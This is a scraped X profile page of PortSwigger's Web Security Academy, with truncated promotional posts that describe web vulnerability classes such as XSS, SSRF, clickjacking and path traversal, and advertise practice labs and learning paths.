Web Security Academy
@WebSecAcademy
Free web security training from @PortSwigger
Potrebbero piacerti
Can’t trigger full XSS? You might still exfiltrate data. Dangling markup injection is the XSS fallback technique attackers rely on. What is Dangling Markup Injection? Dangling markup injection happens when attacker-controlled input is placed into HTML without proper encoding,…
It's such a joy watching @_JohnHammond discover Burp AI's "explore issue" feature for the first time! Check it out.
Clickjacking leaves users exposed to hidden UI actions. Frame-busting scripts often fail, leaving sites vulnerable to overlay tricks. Here's how to defend against it👇 X-Frame-Options was first introduced in IE8 and later adopted by other browsers. It lets site owners control…
DOM-based XSS happens entirely in the browser - no server required. It’s subtle, client-side, and often missed by traditional scanners. What is DOM XSS? DOM-based XSS occurs when JavaScript reads data from a user-controllable source (like the URL) and passes it into a…
Learning path: GraphQL API vulnerabilities This learning path explores common vulnerabilities associated with GraphQL APIs. It covers how these vulnerabilities arise from implementation and design flaws, and how to bypass and exploit them. You’ll learn how to: 🔶 Discover API…
Security research doesn’t have to be lonely. Come meet others who think like you. 👉 discord.gg/portswigger 👈
APPRENTICE LAB: Basic SSRF against another back-end system Use the stock check feature to scan the internal 192.168.0.X range for an admin interface on port 8080, then delete user carlos. What you’ll learn 🔸 How SSRF can be used to reach internal-only services 🔸 How to use…
Learning path: NoSQL injection This learning path covers the detection, exploitation, and prevention of NoSQL injection vulnerabilities. You’ll learn: 🔶 The core principles behind NoSQL injection and the different types of attacks. 🔶 How to perform both syntax and operator…
Stored cross-site scripting (XSS) is more dangerous than most people realize. It doesn’t rely on a user clicking a link - it waits silently in the app. What is Stored XSS? Stored XSS (also known as persistent or second-order XSS) happens when user-supplied input is saved by…
APPRENTICE LAB: Exploiting an API endpoint using documentation Can you find the exposed API documentation and delete Carlos? What you’ll learn 🔸 How exposed API docs can reveal endpoints 🔸 How to discover and interact with API docs in-situ 🔸 How to use Burp to enumerate and…
The Ultimate XSS Cheat Sheet! This XSS cheat-sheet lists vectors (filterable by event, tag, or browser) that can bypass WAFs and filters! Each entry even includes a proof-of-concept. Bookmark this 👉 portswigger.net/web-security/c…
Learning path: Path traversal This learning path covers path traversal vulnerabilities, teaching you how to perform attacks, circumvent common obstacles, and prevent them in your applications. You’ll learn: 🔶 What path traversal is and how it can be used to read arbitrary…
APPRENTICE LAB: Basic clickjacking with CSRF token protection. Clickjacking tricks users into clicking something they don’t see, often within a transparent iframe. Even with CSRF tokens in place, user interaction can still be weaponized, and that’s exactly what this lab teaches.…
[APPRENTICE LAB] Reflected XSS into attribute with angle brackets HTML-encoded This interactive lab teaches how to exploit reflected XSS by escaping HTML attributes and using event handlers. What you'll learn: ✅ Why encoding angle brackets is not sufficient ✅ How to inject…
United States Tendenze
- 1. Auburn 46K posts
- 2. At GiveRep N/A
- 3. Brewers 65.4K posts
- 4. Cubs 56.6K posts
- 5. Georgia 68.1K posts
- 6. Gilligan 6,139 posts
- 7. Utah 25.3K posts
- 8. #SEVENTEEN_NEW_IN_TACOMA 32.6K posts
- 9. #byucpl N/A
- 10. Kirby 24.2K posts
- 11. Arizona 41.8K posts
- 12. Wordle 1,576 X N/A
- 13. MACROHARD 3,723 posts
- 14. #AcexRedbull 4,213 posts
- 15. Michigan 63K posts
- 16. #Toonami 2,988 posts
- 17. #BYUFootball 1,020 posts
- 18. Boots 50.8K posts
- 19. Hugh Freeze 3,276 posts
- 20. mingyu 89.2K posts
Potrebbero piacerti
-
PortSwigger Research
@PortSwiggerRes -
HackerOne
@Hacker0x01 -
Hack The Box
@hackthebox_eu -
Burp Suite
@Burp_Suite -
PortSwigger
@PortSwigger -
bugcrowd
@Bugcrowd -
TryHackMe
@RealTryHackMe -
HackerSploit
@HackerSploit -
PentesterLab
@PentesterLab -
OffSec
@offsectraining -
TCM Security
@TCMSecurity -
Pentester Land
@PentesterLand -
publiclyDisclosed
@disclosedh1 -
Intigriti
@intigriti -
John Hammond
@_JohnHammond
Something went wrong.
Something went wrong.